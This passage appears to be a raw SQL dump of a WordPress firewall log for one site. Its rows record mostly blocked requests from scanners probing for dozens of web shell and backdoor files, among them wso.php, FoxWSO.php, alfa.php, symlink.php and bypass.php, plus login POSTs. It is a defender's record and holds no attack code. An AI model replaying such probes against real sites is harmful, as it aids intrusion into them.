Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','pD3rjyKaoTGY90Zh8AbVknOE',0,1636912317.1954,1032,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://ashbooks.co.uk/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\"}','9NyLP2GS7mstOb0vQlDHYMTw',0,1636912318.8014,2186,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://ashbooks.co.uk/wp-booking.php','','{\"1\":\"python-requests\\/2.26.0\"}','3qN0zwuDcPCglpoQMJjXYfxr',0,1636912321.7232,1176,'','GET',403,0,700,0,1,'',0),('23.146.241.20',395505940,'','https://ashbooks.co.uk/wp-booking.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','kW4ZFcUGV5KdnrvLfpuNaT6s',0,1636912323.3164,756,'','GET',403,0,700,0,1,'',0),('128.199.14.4',2160528900,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','2slRVoZHFg0TkBzGOh7EbCvn',0,1636913019.2034,445,'','POST',403,0,600,0,1,'',0),('64.225.29.51',1088494899,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','GlrLePKpRjTBWcF9vEtsxgqy',0,1636913804.9523,500,'','POST',403,0,600,0,1,'',0),('3.1.209.37',50450725,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','I5Yg0o4J93rQqvRdXExBGibh',0,1636914564.9891,495,'','POST',403,0,600,0,1,'',0),('167.86.84.227',2807452899,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','CqrIdeF7vwPpD09TbLkY1aR8',0,1636915321.6118,611,'','POST',403,0,600,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','yLTa6B0ZRsOWvpiwoVKGAeJq',0,1636915572.3656,399,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/alex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ztHUrlKexhuJob8j76Mpc1Bq',0,1636915610.8018,394,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','c1Rz7WoZkNaVG3MsyvYJjuHr',0,1636915627.3003,452,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/anone.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','GN9ZlJbf7vRtAs6MeFudzH1D',0,1636915627.8754,149,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Kkl06Fjmxnh9WLaov2DfudAT',0,1636915628.2736,408,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/wp-configer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','tpybedV94CY7FXoal8sNwW1z',0,1636915628.8761,162,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','YKUtSFdzTsI6HfAh1BRcWu3N',0,1636915629.1821,457,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','R0HkuVAZI37PFQBJTtUEgeWM',0,1636915629.7528,225,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','LcS4Ov0pygmDWeAlfXUboa8w',0,1636915630.1284,417,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','d4GWtq1wTIFke90j82HnQCJi',0,1636915630.7379,185,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/send.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','kS6tVzb3ch09doZUeAX8mvqu',0,1636915631.1899,413,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/3.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','4poPwzKARhHTsJxe1SXDYFqI',0,1636915631.8296,140,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Btij2AG80JZuIceq45PQyU9V',0,1636915632.4306,388,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/sym.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','z3xSX1tWDlHgvNBqAIip8uYF',0,1636915633.0933,424,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/wp-confirm.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ukrVQETIU3x6zb4tjfsKO19q',0,1636915633.9177,133,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/images/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','pdgYJ9mwAtCq3GW8FQhVxSvl',0,1636915634.2717,392,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/dr.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','w21kU3Or7nRPAZcJN9Kziehb',0,1636915635.0263,424,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dHzYimS6X0Zvr8qpf7NjUEx4',0,1636915635.7052,182,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/bypass.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','9KM7Q1d6U4CiPGaOq2SXngvj',0,1636915636.0662,423,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/wp-blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','IREWSuoiJ2xKcPOdaNp85bkX',0,1636915636.6775,173,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/data.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','CIgLAGXkjYhdNTMvoznDq1OP',0,1636915637.1324,414,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/owl.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','RDi8FUa2KQALS7JpfuvO9GrY',0,1636915637.7753,145,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','AM97tdjTX53OmRlLHovZqJkK',0,1636915638.1641,400,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/symlink.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','6bqDriJC2s7dQEyHUlRT40zf',0,1636915638.7039,178,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/ohayo.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','x1YvVKnTXifLM7jlOQat5s8z',0,1636915639.1179,423,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/100.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','0BhbOL6Ej7ys5efdvXro9Itc',0,1636915639.8883,177,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/777.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Fj9TL3HW1uVypIn7ogSXMPJC',0,1636915640.2657,408,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/wp-content/wp-logins.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Pb4tQO0a2VER86dUg1hTou9D',0,1636915640.9014,148,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','m30MVnCHgtQSONDj5rx91ZEh',0,1636915641.2710,438,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/wp-wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','deskS5OTNafbg7ZPcyDFrmHU',0,1636915642.0408,391,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/2index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','kr2MUfAmEKcNdRTb5zlVvFxo',0,1636915642.5771,168,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/wp-content/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','wYEXJlSx3okVas59mNO1FDAd',0,1636915643.3217,397,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/wp-configer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','BqugejIFA36kV0E71sHWQMzc',0,1636915644.4717,427,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Tfx5qEO8vRJLnbWajzCAewFB',0,1636915645.0518,429,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/mini.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dFfHhAp4vbmzY5XW9CkNSxU6',0,1636915645.6323,143,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','C3NHbTmgersliSkwnzv4PYXU',0,1636915645.9642,145,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/doc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','j6e4qPfWZHl08xcOIugDAdKG',0,1636915646.2666,439,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/ups.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ViQ6uybCgqRSfHF47GAp3Ox9',0,1636915646.8902,130,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/shx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','SU39G01TF2Ye64kulLoMNHXA',0,1636915647.2101,416,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/FoxWSO.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','AQZ3lId0hRPYeKHF6xLaJ95M',0,1636915647.7518,186,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','mJg2V4MOY6n8TseZFjI397Gc',0,1636915648.1811,391,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/cms.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Es5tq9mxMGQw7vfdJr6uB8i1',0,1636915648.7092,168,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/stindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','6zaYEyt1J2mcSPDruRAkX7Z9',0,1636915649.0449,400,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/wp-uploads.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','eaZ8Bo7rSxynlLWFIs6MqVpX',0,1636915650.0321,426,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/autoload_classmap.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','xERDtWbsQFignJoUdfThwcuK',0,1636915650.6632,158,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/Gel.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','DFvAa2HNOT1qMZsEJzn6Rtp7',0,1636915651.0702,392,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','TOeDYWbZFltN7Sr46u3Bv0my',0,1636915651.6589,125,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/0byte.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','HGSt1KzwjnhWF49Q6lZ2aX3y',0,1636915652.2359,416,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rzQdNeg92LOJSyucTHpIni3v',0,1636915653.1106,376,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/41.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','kNuo5H6Ivfj1wMKZzt7TPlbp',0,1636915653.6300,127,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/media-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','GfPxKOjeCB39IU4oyu2RLmhD',0,1636915654.1379,367,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/4price.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','VSkpjwBN4rlqncZJOUTtCfI1',0,1636915654.7194,142,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/MARIJUANA.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','OL5jaoAkP0ypXRZfeExGNcln',0,1636915655.0490,379,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/f.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','C4ie01EDPO7UWIj8HGbQaYVm',0,1636915655.6395,127,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/.fk.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','tiGWjkI6NZyHJX8BSfKs0u4e',0,1636915656.3026,430,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','r48ZIdjFlVXDBoS6kQ29xCnL',0,1636915656.8837,174,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/xox.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','YynMbjRcZf1lPSixz8hwKVNU',0,1636915657.2798,382,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/o.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','mbk5tAEhsvxGD6HzUq2r4Fcn',0,1636915657.8377,123,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','SBpR70ziVEdOJZbLjvoYlPnc',0,1636915658.1777,392,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/3index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','61f9jxeK5wNriR72QMFsSY3u',0,1636915658.8736,125,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/sindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','CVreFBKcWgU9wZ1moY5asMSI',0,1636915659.1950,381,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/baindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','bpw0Eg2GBNxJMoRDafW9AkHU',0,1636915659.8531,127,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/new-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Y0gLeol7fKH8U9sncau4F1qW',0,1636915660.1142,368,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/wi.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','r0EuASiwLg2qUkfxXz9RN4IC',0,1636915660.7649,129,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/XxX.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','OupzB1HJoI6YMGyk5dgDX8NZ',0,1636915661.2742,397,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Eael0xJ7ir9qdutcHUPwNzyb',0,1636915662.0397,395,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/root.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','n3mdvqDu9E6GgB5ayleSiAZp',0,1636915662.8257,130,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/11index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','IxLsX5bjhcentCviEodfm1J2',0,1636915663.1463,381,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','amIDWQ28EfZHGPrOYLlxj3JA',0,1636915663.7257,123,'','GET',404,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/nee.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','GVeLdrhFWN04uPlo2SDBnvqf',0,1636915664.0915,388,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/v.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Ty6g7SRACmKzf5aNusFQ19UV',0,1636915664.8235,408,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/z.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','oYeiIAJ0aNX2cvLUwgx4C8lB',0,1636915665.4743,402,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','EzafItYRK8y1NMeswp2S6Djm',0,1636915666.0527,410,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/g.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','QUzajby2HVJKWGZuMkNgo70Y',0,1636915666.6033,128,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 